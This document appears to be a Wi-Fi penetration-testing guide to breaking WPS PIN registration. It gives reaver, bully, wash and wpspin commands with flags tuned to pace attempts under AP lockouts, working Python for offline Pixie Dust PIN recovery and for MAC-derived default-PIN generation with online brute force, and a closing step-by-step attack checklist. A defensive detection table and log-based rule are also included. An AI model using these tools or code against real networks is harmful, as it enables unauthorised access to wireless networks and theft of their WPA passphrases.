WPS PIN registration is an eight-message EAP exchange (M1 through M8) in which the PIN proves that both sides hold the same secret; once the PIN checks out, the AP hands its network credentials, including the WPA PSK, to the other side in M7. The PIN is verified in two halves, the first four digits and the last four (the 8th digit is a checksum over the first seven), and the AP reveals after M4 whether the first half was right, so an online attacker needs at most 10,000 + 1,000 = 11,000 guesses instead of 10^8. On chipsets with weak nonce generation, the offline Pixie Dust attack recovers the PIN from a single captured exchange in seconds, without any online guessing.
# wash — dedicated WPS scanner
sudo wash -i wlan0mon
# Or use airodump-ng with WPS column
sudo airodump-ng wlan0mon --wps
The output shows, per AP, the WPS version (1.0 / 2.0), whether PIN registration is currently locked (the Lck column in wash) and the vendor; the beacon's WPS IE also carries the Configured/Unconfigured state and the supported config methods (PIN, PBC).
WPS 2.0 requires APs to lock PIN registration after repeated failures, but many consumer APs implement only a short lockout (for example 60 seconds after a few failures), which an attacker bypasses simply by pacing attempts and waiting it out.
The Pixie Dust attack (Dominique Bongard, 2014) exploits weak generation of the enrollee's secret nonces E-S1 and E-S2 on affected chipsets. The AP commits to each PIN half in M3 as E-Hash1 = HMAC(AuthKey, E-S1 || PSK1 || PKE || PKR), and E-Hash2 likewise, so those nonces are the only secret standing between the attacker and an offline search over each half. When they are predictable (all zeros on Ralink, derived from the public E-Nonce on affected Broadcom firmware, time-seeded on Realtek), the attacker needs only the values exchanged in M1 through M3 (E-Nonce, PKE, PKR, E-Hash1, E-Hash2) plus the AuthKey derived from the Diffie-Hellman exchange, and pixiewps computes the PIN offline; reaver's -K mode captures these and invokes pixiewps for you.
# reaver with Pixie Dust mode
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -K 1 -vvv
# bully alternative
sudo bully -b AA:BB:CC:DD:EE:FF -d -v 3 wlan0mon
| Chipset | Vulnerable? |
|---|---|
| Ralink (RT chipsets) | Yes — most older D-Link, TP-Link, Edimax |
| Realtek (RTL8xxx) | Yes — many TRENDnet, Belkin |
| Broadcom (older firmware) | Often yes — specific model + firmware revs |
| MediaTek (specific revs) | Mixed |
| Atheros | Mostly patched |
When successful:
[Pixie-Dust] WPS PIN: 12345670
[Pixie-Dust] WPA PSK: ActualPasswordHere
[Pixie-Dust] AP SSID: HomeWiFi
Once the PIN is known, the AP delivers the PSK in M7 of an ordinary exchange, so there is no PSK cracking step at all.
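The mechanism above, worked end to end as an added example (not code from pixiewps or reaver): a simulated AP builds E-Hash1/E-Hash2 exactly as the WSC spec defines them, with all-zero E-S1/E-S2 as on Ralink, and the recovery routine brute-forces the two PIN halves offline from nothing but the M1 to M3 values. AuthKey, PKE and PKR are constructed random test values here; in a real run they come from the captured M1 (PKE, E-Nonce), the attacker's own M2 (PKR) and the DH-derived key. The second call shows the same search failing against an AP that draws random nonces, which is the whole difference between a vulnerable and a patched chipset.

```python
"""Pixie Dust offline PIN recovery against a simulated AP whose enrollee
secret nonces E-S1 and E-S2 are all zero (the Ralink case).
Added example, not code from pixiewps or reaver. AuthKey, PKE and PKR are
constructed random test values; in practice they come from the captured
M1-M3, the attacker's own M2 and the Diffie-Hellman shared key."""
import hashlib
import hmac
import os

NONCE_LEN = 16          # E-S1 / E-S2 are 128-bit
DH_PUBKEY_LEN = 192     # PKE / PKR are 1536-bit


def _hmac256(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.sha256).digest()


def psk_halves(authkey: bytes, pin: str):
    """WSC: PSK1/PSK2 = first 128 bits of HMAC-SHA256(AuthKey, ASCII half)."""
    return (_hmac256(authkey, pin[:4].encode())[:16],
            _hmac256(authkey, pin[4:].encode())[:16])


def enrollee_hashes(authkey, pke, pkr, pin, es1, es2):
    """What the AP (enrollee) puts in M3:
    E-Hash1 = HMAC(AuthKey, E-S1 || PSK1 || PKE || PKR), E-Hash2 likewise."""
    psk1, psk2 = psk_halves(authkey, pin)
    return (_hmac256(authkey, es1 + psk1 + pke + pkr),
            _hmac256(authkey, es2 + psk2 + pke + pkr))


def pixie_recover(authkey, pke, pkr, ehash1, ehash2, es1_guess, es2_guess):
    """Offline search for the PIN given a guess of the secret nonces.
    Returns the 8-digit PIN, or None if the nonce guess does not fit."""
    first = None
    for i in range(10_000):
        half = f"{i:04d}"
        psk1 = _hmac256(authkey, half.encode())[:16]
        if _hmac256(authkey, es1_guess + psk1 + pke + pkr) == ehash1:
            first = half
            break
    if first is None:
        return None
    # Second half: search all 10^4 values, not just the 10^3 checksum-valid
    # ones. Offline that costs nothing, and some APs accept a bad checksum.
    for j in range(10_000):
        half = f"{j:04d}"
        psk2 = _hmac256(authkey, half.encode())[:16]
        if _hmac256(authkey, es2_guess + psk2 + pke + pkr) == ehash2:
            return first + half
    return None


def demo(weak_nonces: bool = True):
    """Simulate an AP with PIN 12345670 and run the recovery with the Ralink
    all-zero nonce guess. Returns the PIN, or None when the AP actually drew
    random nonces (the guess is wrong, so the first-half search fails)."""
    authkey = os.urandom(32)
    pke, pkr = os.urandom(DH_PUBKEY_LEN), os.urandom(DH_PUBKEY_LEN)
    zero = bytes(NONCE_LEN)
    es1, es2 = (zero, zero) if weak_nonces else (os.urandom(16), os.urandom(16))
    ehash1, ehash2 = enrollee_hashes(authkey, pke, pkr, "12345670", es1, es2)
    return pixie_recover(authkey, pke, pkr, ehash1, ehash2, zero, zero)


if __name__ == "__main__":
    print("weak nonces   ->", demo(True))    # 12345670
    print("random nonces ->", demo(False))   # None
```

The whole search is about 20,000 HMAC-SHA256 calls, which is why real Pixie Dust runs finish in seconds; the Broadcom and Realtek cases differ only in how es1_guess/es2_guess are produced (from the E-Nonce-seeded LCG or from a timestamp near the capture), not in this search.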
When Pixie Dust fails, online brute force is the fallback. Each attempt runs the exchange up to M4: the attacker's M4 commits to a guessed first half, and the AP answers with an EAP-NACK if it is wrong or continues with M5 if it is right. Once the first half is known, each further attempt carries a second-half guess in M6; a correct guess is answered with M7 and the credentials.
# reaver online mode (default)
sudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF \
-L -N -d 15 -t 30 -T .5 -r 3:30 -vv
# Flags:
# -L : ignore the locked state the AP reports (reaver keeps trying; the AP may still refuse)
# -N : don't send NACKs when out-of-order packets arrive
# -d 15 : 15-second delay between PIN attempts
# -t 30 : receive timeout, seconds
# -T .5 : timeout for receiving M5/M7, seconds
# -r 3:30 : pause 30 s after every 3 attempts
Most modern APs lock WPS after a few failed PINs. Detect lockout: the Locked flag in the beacon's WPS IE (the Lck column in wash) flips to Yes, and reaver warns that it has detected AP rate limiting.
Strategies: wait out the lock window instead of hammering through it (-L only makes reaver keep sending), and set -d and -r accordingly so the attempt rate stays under the AP's threshold.
WPS PBC (push-button) opens a 120-second window after the user presses the button on the AP. During this window any client that starts a PBC registration is paired without a PIN.
Attack viability: purely opportunistic. The attacker must be in range and start a PBC registration while a user or installer is pressing the button; nothing lets the attacker force the window open. reaver has no push-button mode (its -p option sets a fixed PIN and -P, where present, is Pixie-loop mode; neither is PBC), so PBC is driven from a managed-mode interface with wpa_supplicant:
# Trigger a PBC pairing attempt (managed-mode interface, wpa_supplicant running)
sudo wpa_cli -i wlan0 wps_pbc AA:BB:CC:DD:EE:FF
# On success wpa_supplicant receives the credentials (written to its config if update_config=1)
Some vendors derive the default WPS PIN from the BSSID or serial number with an algorithm that has since been published (ComputePIN for many Arcadyan/Ralink-based routers, Craig Heffner's Belkin and D-Link algorithms, ZyXEL). With known algorithms:
# wpscalc / WPSPIN — calculate likely PINs from BSSID
wpspin --bssid AA:BB:CC:DD:EE:FF
# Outputs candidate PINs to try first before brute
Hit rate is high on the affected Belkin, ZyXEL, D-Link and Linksys models, and the candidate costs one registration attempt, so it always goes before the brute force; the reaver-wps-fork-t6x build can generate the Belkin/D-Link/ZyXEL candidates itself with -W (--generate-pin).
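The PIN structure, the vendor-candidate shortcut and the two-phase online search from the sections above, put together as an added example (not code from reaver or wpspin): a checksum helper, the published ComputePIN algorithm (low 24 bits of the BSSID mod 10^7 plus checksum, which only fits the vendors that shipped it) and a search routine that tries vendor candidates first and then walks first halves and checksum-valid second halves the way reaver does. The AP is a simulated enrollee-side state machine with a constructed secret PIN; it answers NACK after M4, NACK after M6 or M7, which is all the attacker needs to learn the halves separately and is where the 11,000 worst case comes from.

```python
"""WPS PIN checksum, a MAC-derived default-PIN candidate, and the two-phase
online search reaver performs. Added example, not code from reaver or wpspin.
The AP is a simulated state machine with a constructed secret PIN;
compute_pin() is the published ComputePIN algorithm and only fits the
vendors that used it."""


def wps_checksum(seven: str) -> str:
    """Checksum digit over the first seven PIN digits (weights 3,1,3,1,3,1,3)."""
    acc = sum((3 if i % 2 == 0 else 1) * int(d) for i, d in enumerate(seven))
    return str((10 - acc % 10) % 10)


def is_valid_pin(pin: str) -> bool:
    return len(pin) == 8 and pin.isdigit() and wps_checksum(pin[:7]) == pin[7]


def compute_pin(bssid: str) -> str:
    """ComputePIN default-PIN candidate for a BSSID like 'AA:BB:CC:DD:EE:FF'."""
    low24 = int(bssid.replace(":", "").replace("-", ""), 16) & 0xFFFFFF
    body = f"{low24 % 10_000_000:07d}"
    return body + wps_checksum(body)


class SimulatedAP:
    """An AP acting as WPS enrollee: it checks the first PIN half at M4 and
    the second at M6, which is exactly what leaks the halves separately."""

    def __init__(self, pin: str):
        self._pin = pin
        self.exchanges = 0      # one per registration attempt (one PIN tried)

    def try_pin(self, pin: str) -> str:
        self.exchanges += 1
        if pin[:4] != self._pin[:4]:
            return "NACK after M4"        # wrong first half
        if pin[4:] != self._pin[4:]:
            return "NACK after M6"        # right first half, wrong second
        return "M7"                       # credentials delivered


def online_search(ap: SimulatedAP, candidates=()):
    """Try vendor candidates first, then the two-phase search.
    Returns (pin or None, number of registration attempts used)."""
    for cand in candidates:
        if ap.try_pin(cand) == "M7":
            return cand, ap.exchanges
    first = None
    for i in range(10_000):                      # phase 1: up to 10^4 first halves
        result = ap.try_pin(f"{i:04d}0000")
        if result == "M7":
            return f"{i:04d}0000", ap.exchanges
        if result != "NACK after M4":            # any answer past M4 confirms the half
            first = f"{i:04d}"
            break
    if first is None:
        return None, ap.exchanges
    for j in range(1_000):                       # phase 2: 10^3 checksum-valid second halves
        body = first + f"{j:03d}"
        pin = body + wps_checksum(body)
        if ap.try_pin(pin) == "M7":
            return pin, ap.exchanges
    return None, ap.exchanges                    # AP uses a PIN with a bad checksum


if __name__ == "__main__":
    print(compute_pin("AA:BB:CC:DD:EE:FF"))                      # 45446399
    print(online_search(SimulatedAP("12345670")))                # ('12345670', 1803)
    print(online_search(SimulatedAP("45446399"),
                        [compute_pin("AA:BB:CC:DD:EE:FF")]))     # ('45446399', 1)
    print(online_search(SimulatedAP("99999995"))[1])             # 11000, the worst case
```

Phase 2 only tries checksum-valid second halves, as reaver does by default; an AP whose PIN ignores the checksum needs the full 10^4 there, so a None result after phase 1 succeeded is a hint to widen the search rather than a sign the first half was wrong.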
| Signal | Defender View |
|---|---|
| Reaver/bully online brute force | WIPS rule: many WPS registrations from one unknown station, each ending in an EAP-NACK after M4 |
| PIN failure spike | AP sets the WPS Locked flag in its beacon; some WIPS alert on the flip |
| Pixie Dust PIN recovery | Nothing to see: the PIN is computed offline; on air it is one aborted exchange followed by one successful one |
| Consumer admin interface | WPS attempts are logged only if the AP has audit logging (rare) |
From the wire, Pixie Dust against a vulnerable chipset is close to invisible: the capture exchange aborts after M3/M4 like any mistyped PIN, and the follow-up exchange with the recovered PIN looks like a legitimate registrar enrolling.
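The first row of the table as working detection logic, added here as an example rather than any WIPS product's rule. The log format (one line per WSC registration outcome, as an AP or sensor might emit it) and both sample logs are constructed for the example. The rule counts EAP-NACKs per station in a sliding window; the brute-force sample trips it on the third NACK, while the Pixie Dust sample (one aborted exchange, then one success) never does, which is the point made in the last row.

```python
"""Rate-based detection of online WPS PIN brute force over constructed log
lines. Added example, not a WIPS product's rule; the log format and samples
are made up for the example."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample logs: sta = client MAC, wsc = last WSC message of the
# registration, result = NACK or OK.
BRUTE_LOG = [
    "2024-05-01T10:00:00Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
    "2024-05-01T10:00:05Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
    "2024-05-01T10:00:10Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
    "2024-05-01T10:00:15Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
    "2024-05-01T10:00:20Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
]
PIXIE_LOG = [
    # one aborted exchange with a bogus PIN (only there to capture M3), then the real one
    "2024-05-01T11:00:00Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M4 result=NACK",
    "2024-05-01T11:00:30Z sta=02:11:22:33:44:55 bssid=AA:BB:CC:DD:EE:FF wsc=M7 result=OK",
]

LINE = re.compile(r"^(?P<ts>\S+) sta=(?P<sta>\S+) bssid=(?P<bssid>\S+) "
                  r"wsc=(?P<msg>M\d) result=(?P<res>\S+)$")


def parse_line(line: str):
    """Return the event as a dict, or None for lines that are not WSC outcomes."""
    m = LINE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
    return ev


def detect_wps_brute(lines, threshold=3, window=timedelta(seconds=60)):
    """Alert once per station that accumulates `threshold` WSC NACKs inside
    `window`. Returns [(sta, ISO timestamp of the triggering NACK), ...]."""
    recent = defaultdict(deque)
    alerts, alerted = [], set()
    for line in lines:
        ev = parse_line(line)
        if ev is None or ev["res"] != "NACK":
            continue
        q = recent[ev["sta"]]
        q.append(ev["ts"])
        while q and ev["ts"] - q[0] > window:   # drop NACKs older than the window
            q.popleft()
        if len(q) >= threshold and ev["sta"] not in alerted:
            alerted.add(ev["sta"])
            alerts.append((ev["sta"], ev["ts"].isoformat()))
    return alerts


if __name__ == "__main__":
    print(detect_wps_brute(BRUTE_LOG))   # [('02:11:22:33:44:55', '2024-05-01T10:00:10')]
    print(detect_wps_brute(PIXIE_LOG))   # []
```

Size the window against the attacker's pacing, not a user's: with the reaver flags above (-d 15 -r 3:30) the attempt rate drops to roughly three per 75 seconds, so a 60-second window with a threshold of 3 can miss it, while a real user mistyping a PIN produces one or two NACKs and then stops. A longer window (several minutes) with a slightly higher threshold catches the paced attack without flagging the user.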
# 1. Setup
sudo airmon-ng check kill && sudo airmon-ng start wlan0
# 2. Find WPS APs
sudo wash -i wlan0mon
# 3. Pixie Dust first
sudo reaver -i wlan0mon -b <BSSID> -K 1 -vvv
# 4. If Pixie Dust fails, try vendor-specific PIN candidates
wpspin --bssid <BSSID> | head -10
# 5. Online brute as last resort
sudo reaver -i wlan0mon -b <BSSID> -L -N -d 15 -t 30 -r 3:30 -vv
# 6. Once PIN known, derive PSK from M7 message
# (reaver does this automatically; bully prints PSK on success)